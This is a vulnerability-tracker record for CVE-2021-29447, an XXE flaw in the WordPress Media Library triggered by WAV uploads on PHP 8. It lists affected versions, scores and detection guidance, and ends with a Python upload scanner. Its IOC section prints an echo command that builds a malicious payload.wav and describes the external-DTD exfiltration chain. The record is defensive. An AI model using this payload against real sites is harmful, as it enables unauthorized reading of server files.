CVE-2021-29447
published 2021-04-15


Priority: P2 (67) · Severity: medium · CVSS 3.1: 6.5
Vector: AV:N AC:L PR:L UI:N S:U C:H I:N A:N
Exploit: available
EPSS: 85.72% (99.7th percentile)
WordPress is an open source CMS. A user with the ability to upload files (such as an Author) can exploit an XML parsing issue in the Media Library, leading to XXE attacks. This requires the WordPress installation to be running PHP 8. A successful XXE attack gives access to internal files. This has been patched in WordPress version 5.7.1, and in the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.

Affected (9 ranges)

Vendor    | Product           | Version range                        | Fixed in
debian    | debian_linux      |                                      |
debian    | debian_linux      |                                      |
debian    | wordpress         | < wordpress 5.7.1+dfsg1-1 (bookworm) | wordpress 5.7.1+dfsg1-1 (bookworm)
wordpress | wordpress         | >= 0 < 5.7.1+dfsg1-1                 | 5.7.1+dfsg1-1
wordpress | wordpress         | >= 0 < 5.7.1+dfsg1-1                 | 5.7.1+dfsg1-1
wordpress | wordpress         | >= 0 < 5.7.1+dfsg1-1                 | 5.7.1+dfsg1-1
wordpress | wordpress         | >= 0 < 5.7.1+dfsg1-1                 | 5.7.1+dfsg1-1
wordpress | wordpress         | >= 5.6.0 < 5.7.1                     | 5.7.1
wordpress | wordpress-develop |                                      |

Detection & IOCs (extracted from sources)

filename: payload.wav
path:     /wp-admin/async-upload.php
path:     /wp-admin/media-new.php
path:     /wp-login.php
filename: malicious.wav
command:  echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00" > payload.wav
bytes:    RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00
  • Malicious WAV file crafted for XXE exploitation begins with RIFF header followed by iXML chunk containing XML DTD entity declarations (%remote;%init;%trick;). Detect uploads of WAV files to WordPress Media Library where the iXML chunk contains DOCTYPE or ENTITY declarations.
  • Exploit uploads a malicious WAV file to /wp-admin/async-upload.php with action=upload-attachment. Monitor POST requests to this endpoint from Author-level (or higher) authenticated users uploading audio/WAV MIME-type files containing XML entity payloads.
  • The XXE payload causes the WordPress server to make an outbound HTTP GET request to an attacker-controlled server fetching a DTD file, then a second GET request exfiltrating base64+zlib-encoded file contents as a URL query parameter (?p=<data>). Monitor for outbound HTTP GET requests from the web server process with a ?p= parameter containing large base64 strings.
  • The exploit retrieves a _wpnonce value from /wp-admin/media-new.php before uploading. Anomalous scraping of media-new.php followed immediately by a WAV file upload to async-upload.php from the same session is a strong behavioral indicator.
  • Exploit targets WordPress versions 5.6–5.7 running PHP 8. Correlate WordPress version header/generator tag with PHP version in server responses to identify vulnerable instances.
  • Exfiltrated data arrives at the attacker HTTP server as a base64url-encoded, zlib-compressed string in the ?p= query parameter of a GET request. A WAF or proxy rule matching GET requests with ?p= values longer than ~100 characters originating from the WordPress server process can detect active exploitation.
  • Exploitation requires the WordPress installation to be running PHP 8; the XXE via iXML WAV parsing is not triggered on PHP 7.
  • The attacker must be an authenticated WordPress user with file upload capability (e.g., Author role or higher); unauthenticated exploitation is not possible.
  • The exploit requires the attacker to host an external DTD file on a server reachable from the WordPress host (outbound HTTP from the target to attacker-controlled infrastructure is required for the XXE chain to complete).
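An added example, not part of this CVE record or of WordPress itself: a Python upload-time scanner that applies the first detection rule above by walking the RIFF chunk list of a WAV file and flagging an iXML chunk that carries DOCTYPE/ENTITY declarations or parameter-entity references such as `%remote;`. The two sample WAV blobs, the `FMT` bytes and the `dtd.example.invalid` host are constructed for the demonstration.

```python
import re
import struct

# Byte markers of DTD processing and a regex for parameter-entity references
# such as %remote; (the page's own IOC). Constructed list, not from WordPress.
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM")
PE_REF = re.compile(rb"%[A-Za-z_][\w.-]*;")


def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE container."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return  # not a WAV file: nothing to scan
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield chunk_id, data[pos + 8:pos + 8 + size]  # tolerates a truncated tail
        pos += 8 + size + (size & 1)  # RIFF chunks are padded to even length


def scan_wav_for_xxe(data: bytes) -> dict:
    """Report whether an iXML chunk exists and which DTD indicators it carries."""
    findings = {"has_ixml": False, "indicators": [], "suspicious": False}
    for chunk_id, payload in iter_riff_chunks(data):
        if chunk_id != b"iXML":
            continue
        findings["has_ixml"] = True
        findings["indicators"] += [m.decode() for m in DTD_MARKERS if m in payload]
        findings["indicators"] += [m.decode() for m in PE_REF.findall(payload)]
    findings["suspicious"] = bool(findings["indicators"])
    return findings


def build_wav(chunks) -> bytes:
    """Assemble a RIFF/WAVE file from (id, payload) pairs (constructed test data)."""
    body = b"".join(cid + struct.pack("<I", len(p)) + p + b"\x00" * (len(p) & 1)
                    for cid, p in chunks)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


FMT = b"\x01\x00\x01\x00\x44\xac\x00\x00\x88\x58\x01\x00\x02\x00\x10\x00"  # PCM mono 44.1 kHz
BENIGN_WAV = build_wav([(b"fmt ", FMT), (b"iXML", b"<BWFXML><PROJECT>demo</PROJECT></BWFXML>")])
SUSPICIOUS_WAV = build_wav([
    (b"fmt ", FMT),
    (b"iXML", b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % remote SYSTEM '
              b'"http://dtd.example.invalid/">%remote;]>'),
])

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WAV), ("suspicious", SUSPICIOUS_WAV)):
        print(name, scan_wav_for_xxe(blob))
```

A legitimate iXML chunk (broadcast metadata) never needs a DOCTYPE or a parameter entity, so any hit is worth quarantining the upload before WordPress's media pipeline parses it.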

CVSS provenance

nvd            v3.1  6.5  MEDIUM  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvd            v2.0  4.0  MEDIUM  AV:N/AC:L/Au:S/C:P/I:N/A:N
osv                  6.5  MEDIUM
vendor_debian        7.1  LOW